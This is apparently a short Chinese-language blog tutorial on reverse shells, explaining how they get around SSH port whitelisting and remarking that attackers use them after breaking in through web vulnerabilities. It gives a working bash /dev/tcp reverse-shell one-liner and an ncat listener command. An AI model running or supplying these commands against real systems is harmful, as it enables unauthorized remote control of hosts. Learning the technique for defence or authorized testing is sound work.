Reverse Shell
简介
Reverse Shell 反向Shell。
- 通常我们在服务器上会开放一个ssh 22端口,本地ssh客户端通过此端口进行连接到服务器,这是正向Shell。
- 但是如果服务器对22端口有访问限制的时候,除了白名单的IP能够访问,其他IP地址都访问不到,怎么办呢?
- 这时可以在服务器上执行一条反向shell命令,指定将服务器上的输入输出错误重定向到指定的IP和端口,比如我本机192.168.6.19的4444端口,在服务器表现为一个特殊的设备,如: /dev/tcp/192.168.6.19/4444,这时我本机只要监听在此端口上就可以与服务器建立连接,从而不用通过ssh的22端口。
- 此技术通常用于黑客攻击,通过Web漏洞进入到了系统后,使用此方法实现方便控制主机的目的。
实现
在被控制服务器上执行:
bash -i >& /dev/tcp/192.168.6.19/4444 0>&1
在控制机器上安装 nmap ,然后打开cmd终端执行:
ncat -lvnp 4444
成功连接后即可在控制主机上操作远程被控制主机的系统了。
更多使用方法以及命令可以查看 https://www.revshells.com/
文章目录
关闭
共有 0 条评论